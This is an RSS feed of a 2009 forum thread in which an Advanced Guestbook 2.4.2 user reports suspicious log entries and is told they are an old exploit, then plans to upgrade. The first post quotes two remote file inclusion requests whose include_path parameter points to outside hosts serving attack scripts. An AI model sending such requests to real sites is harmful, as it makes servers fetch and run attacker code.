<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "vulnerability"]]></title>
		<link>https://proxy2.de/forum/posts/list/5.php</link>
		<description><![CDATA[Latest messages posted in the topic "vulnerability"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>vulnerability</title>
				<description><![CDATA[ A while ago I downloaded Advance Guest Book 2.4.2 to my website. For some time now, AWSTATS has shown a lot of visits to the admin.php, index.php and image.php pages of the guestbook, mainly by robots. It also indicates a lot of referrals to my site from strange sites (usually on-line gaming or similar) which have no logical relationship with my site (genealogy and trekking). I checked out site visitors via CPANEL and found addresses of the type below<br /> /xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt?? <br /> /xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt??<br /> <br /> /xfile/admin.php is the admin page of Advanced Guestbook 2.4.2 on my site - the rest seems to be a redirect to a different site - which look a bit suspect to me. I certainly have not placed an such pathways.<br /> <br /> Can you tell me what could be happening?  Is there a vulnerability in Advanced Guestbook that is being exploited by dodgy sites? If there is a problem, has it been resolved in a leter version of Advanced Guestbook?<br /> <br /> Thanks for any help.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/7339/24875.php</guid>
				<link>https://proxy2.de/forum/posts/preList/7339/24875.php</link>
				<pubDate><![CDATA[Wed, 16 Sep 2009 07:36:56]]> GMT</pubDate>
				<author><![CDATA[ gang-gang]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ They are trying to use an exploit that existed a few years ago.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/7339/24876.php</guid>
				<link>https://proxy2.de/forum/posts/preList/7339/24876.php</link>
				<pubDate><![CDATA[Wed, 16 Sep 2009 08:06:30]]> GMT</pubDate>
				<author><![CDATA[ Carbonize]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ Thanks Carbonize,<br /> <br /> I guess that I should upgrade to 2.4.4 or Lazarus to make the site a bit more secure.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/7339/24878.php</guid>
				<link>https://proxy2.de/forum/posts/preList/7339/24878.php</link>
				<pubDate><![CDATA[Thu, 17 Sep 2009 13:09:31]]> GMT</pubDate>
				<author><![CDATA[ gang-gang]]></author>
			</item>
	</channel>
</rss>